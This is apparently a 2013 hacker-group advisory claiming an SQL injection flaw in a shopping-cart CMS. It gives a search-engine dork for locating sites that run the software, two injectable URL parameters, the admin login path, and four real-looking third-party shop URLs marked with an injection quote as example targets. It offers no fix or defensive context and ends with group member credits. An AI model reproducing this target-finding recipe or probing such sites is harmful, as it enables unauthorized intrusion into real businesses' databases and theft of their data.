.:: In The Name Of God ::. #################################################### # 0101SHOP CMS SQL Injection Vulnerability # # Security Risk : High # # Discovered By IRaNHaCK Security Team (MR.XpR # # Our WebSite : IRaNHaCK.ORG # # Tested On : XP , 7 , BackTrack # # Date : 2013-02-16 # # Version : All # # Category : WebApp # #################################################### ================================================================ 1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." = = 2- Vulnerability(s) : = = Target.Com/productdetails.asp?pcode=[SQL] = Target.Com/listproduct.asp?categorycode=[SQL] = = 3- Example : = http://llsclifestyle.com/listproduct.asp?categorycode=101%27 = http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27 = http://shop.honghaico.hk/listproduct.asp?categorycode=1%27 = http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 = = 4- Admin Page : = Target.Com/adminlogin.asp = ================================================================ ********************************************************************************************** We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp * Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG * ********************************************************************************************** ./By MojiRider ./Persian Gulf For Ever